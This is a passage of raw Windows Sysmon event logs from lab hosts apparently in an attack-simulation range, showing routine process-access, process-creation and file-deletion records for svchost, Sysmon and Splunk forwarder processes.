10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1095-6216-3B04-000000003902}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1095-6216-3B04-000000003902}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.211{4F8D34B0-1095-6216-3B04-000000003902}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.194{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A16D5CBC2075208F5E26DA7FAD2B31F,SHA256=29A83B453362E6551E0D6013AF76B10260AD87A311BD3236C7D9CD89D894E153,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:45.857{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-0C00-000000003802}828C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:45.857{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:45.857{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:45.389{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4529B3797C3B3492FC480704A638554,SHA256=B58A54B21E79373285410ECEF21E5852EC84DE620C4182BBE31C98E819E7239D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:46.679{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FCFB4EE6A863D285247613302DC20B0,SHA256=DAC8FE6035D3198203FE46AC4800584753A3EC9F87750440A071DFBF953ADF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:46.679{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21297DC9A533919A253C4BBB5EAE03D5,SHA256=7ED3F23F4C962D766059D8C4BE69BEE591002B48BF6A302F853646B120907A00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:46.679{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BBA35A285A52970A95B22E38E2AB722,SHA256=0BE5C80F4A1384025AE1C219E23C2895C10181C50589C70A7AA426E5D0F4FC58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:46.404{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF52F82B05E319A98622C5164D7D56B9,SHA256=432ED708793D6DD1E64D9FB9396018A0239EC924E437A092FC41CECCAB2BC4E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:47.420{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7F40E88F36FC9C72F18D25A5596CB7D,SHA256=6351CD7DE6CDEC565E1C1A35156F1E8AACECCFE2DED4A113918700CBC24C8DE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.710{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B4A727B844D2EC58CB6E8FF2FEB0A0C,SHA256=B4719A9B400C96C8D42179E3E29A8BCB947DC6F281E8C03256A96DCB009E0EA6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.540{4F8D34B0-1097-6216-3D04-000000003902}3496184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1097-6216-3D04-000000003902}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1097-6216-3D04-000000003902}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.397{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1097-6216-3D04-000000003902}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:47.398{4F8D34B0-1097-6216-3D04-000000003902}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 